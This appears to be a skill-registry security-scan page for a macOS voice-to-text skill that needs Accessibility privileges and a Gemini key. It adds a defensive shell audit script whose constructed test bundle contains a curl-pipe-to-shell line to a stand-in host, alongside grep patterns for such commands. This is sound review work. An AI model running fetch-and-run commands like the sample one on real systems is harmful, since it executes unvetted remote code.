Security scan
OpenClaw
Suspicious
medium confidence
Assessment recommendations
What to consider before installing:
- Metadata mismatch: the registry did not declare any required environment variables, but SKILL.md requires a Gemini API key (GEMINI_API_KEY or ~/.api-key). Expect to provide that key for the app to work.
- High‑privilege behavior: the app needs macOS Accessibility permissions (global key capture) and performs text injection (AXUIElement or simulated paste). Granting Accessibility lets the app observe and affect other apps; only proceed if you trust the source and c...
Detailed analysis
ℹ Purpose and capabilities
The skill's description and SKILL.md match each other (a macOS app that captures a Globe key press, streams audio to Google Gemini, and injects text). However, the registry metadata lists no required environment variables while SKILL.md explicitly requires GEMINI_API_KEY (or a .api-key file). The author should have declared that requirement in the metadata; the requirement itself is consistent with the stated purpose.
⚠ Instruction scope
The runtime instructions ask the user to grant Accessibility permissions (a global event tap) and to add Terminal.app to Accessibility. Both are required for global key capture and text injection, but both are high‑impact actions. The instructions also tell users to run install.sh / build.sh and to store an API key in ~/.api-key or in an environment variable. The skill's behavior (AXUIElement, simulated paste, or CGEvent injection) writes text into other apps and requires macOS privacy privileges; that is functionally coherent but broad in scope and warrants explicit user understanding and review.
ℹ Install mechanism
There is no platform install spec in the registry (instruction-only), but the bundle includes install.sh, native/build.sh and uninstall.sh, i.e. install scripts that will run on the user's machine. The repo references official GitHub releases rather than an arbitrary URL, which is preferable, but any included shell script should be inspected before execution because it will write files and modify system state.
⚠ Credential requirements
Functionally the skill needs a Gemini API key, which SKILL.md asks for; requesting GEMINI_API_KEY is proportionate to the stated cloud‑API purpose. But the registry metadata omits this requirement (it declares no required env vars), creating an incoherence. SKILL.md also suggests storing the key in a plaintext file (~/.api-key), which is a weaker storage approach, and the code itself notes earlier unsafe patterns (e.g., the API key was originally placed in the URL query string). These are security and operational concerns to address before use.
ℹ Persistence and permissions
The skill does not request always:true and is user-invocable (normal). However, it requires macOS Accessibility (AX) privileges and can inject keystrokes and write into other applications, a high privilege for a skill. That privilege is consistent with a global-hotkey plus input-injection tool, but it increases risk: only install if you trust the code and the publisher.
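As an added example, not the registry's or the skill author's code: a shell pre-install review that applies the checks from the install-mechanism, credential and permissions sections above to a locally unpacked copy of a skill bundle. It assumes the bundle layout named in the report (install.sh, native/build.sh, SKILL.md, a plaintext ~/.api-key); the sample bundle it builds, the example.invalid URLs and the shell and Swift lines inside it are constructed here so the script runs offline.

```shell
#!/bin/sh
# Added example (not the registry's or the skill author's code): review a
# downloaded skill bundle before running its install scripts. Run against a
# locally unpacked copy; the constructed sample bundle below stands in for it.

# Install/build scripts that would execute on the host and should be read first.
list_install_scripts() {
  find "$1" -type f -name '*.sh' | sort
}

# Shell lines that pipe a download into a shell, escalate with sudo, or persist
# via LaunchAgents: the state-changing actions the report warns about.
grep_risky_shell() {
  find "$1" -type f -name '*.sh' -exec grep -nHE \
    'curl[^|]*[|][[:space:]]*(ba)?sh|(^|[[:space:];&])sudo[[:space:]]|Library/LaunchAgents' {} + 2>/dev/null || :
}

# API key carried in a URL query string (the unsafe pattern the report notes).
grep_key_in_url() {
  grep -rnE '[?&](key|api_key|apikey|GEMINI_API_KEY)=' "$1" 2>/dev/null || :
}

# Accessibility / input-injection APIs: these need the macOS AX privilege and
# can read from or type into other applications.
grep_ax_injection() {
  grep -rnE 'AXUIElement|CGEventPost|CGEventCreateKeyboardEvent|CGEventTapCreate' "$1" 2>/dev/null || :
}

# A plaintext key file is acceptable only if it is owner-readable alone (0600/0400).
# GNU stat is tried first, then BSD (macOS) stat.
check_key_file_mode() {
  f="$1"
  [ -f "$f" ] || { echo "missing"; return 0; }
  mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")
  case "$mode" in
    600|400) echo "ok:$mode" ;;
    *)       echo "too-permissive:$mode" ;;
  esac
}

count_lines() { [ -z "$1" ] && echo 0 || printf '%s\n' "$1" | wc -l | tr -d ' '; }

# One-line verdict: counts of each finding class plus the key-file check.
audit_summary() {
  dir="$1"; keyfile="$2"
  printf 'scripts=%s risky=%s key_in_url=%s ax=%s keyfile=%s\n' \
    "$(count_lines "$(list_install_scripts "$dir")")" \
    "$(count_lines "$(grep_risky_shell "$dir")")" \
    "$(count_lines "$(grep_key_in_url "$dir")")" \
    "$(count_lines "$(grep_ax_injection "$dir")")" \
    "$(check_key_file_mode "$keyfile")"
}

# Constructed sample bundle mirroring the layout the report describes; the
# URLs, Swift line and key value are made up for the demo.
make_sample_bundle() {
  d=$(mktemp -d)
  mkdir -p "$d/native"
  printf 'Set GEMINI_API_KEY or put the key in ~/.api-key\n' > "$d/SKILL.md"
  printf '#!/bin/sh\ncurl -fsSL https://example.invalid/setup.sh | sh\nsudo cp bin/app /usr/local/bin/\n' > "$d/install.sh"
  printf '#!/bin/sh\nswiftc -O native/main.swift -o bin/app\n' > "$d/native/build.sh"
  printf 'let ax = AXUIElementCreateSystemWide()\nlet url = "https://example.invalid/v1/stream?key=\\(apiKey)"\n' > "$d/native/main.swift"
  printf 'constructed-not-a-real-key\n' > "$d/.api-key"
  chmod 644 "$d/.api-key"
  echo "$d"
}

# Stand-alone demo on the constructed bundle; pass your own unpacked bundle
# directory and key-file path as arguments to audit a real download.
if [ "$#" -ge 1 ]; then
  audit_summary "$1" "${2:-$HOME/.api-key}"
  grep_risky_shell "$1"
else
  SAMPLE=$(make_sample_bundle)
  audit_summary "$SAMPLE" "$SAMPLE/.api-key"
  grep_risky_shell "$SAMPLE"
  rm -rf "$SAMPLE"
fi
```

The summary line is deliberately coarse: any non-zero `risky` or `key_in_url` count, or a `too-permissive` key file, means reading the flagged lines by hand before running install.sh, and a non-zero `ax` count confirms that the Accessibility grant the instructions ask for is really exercised by the code.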
Security is layered; review the code before running it.
Runtime dependencies
No special dependencies
Version
latest v1.3.2 2026/3/25
● Pending
Install command
Official: npx clawhub@latest install xiabb
Mirror (accelerated): npx clawhub@latest install xiabb --registry https://cn.longxiaskill.com (mirror syncing)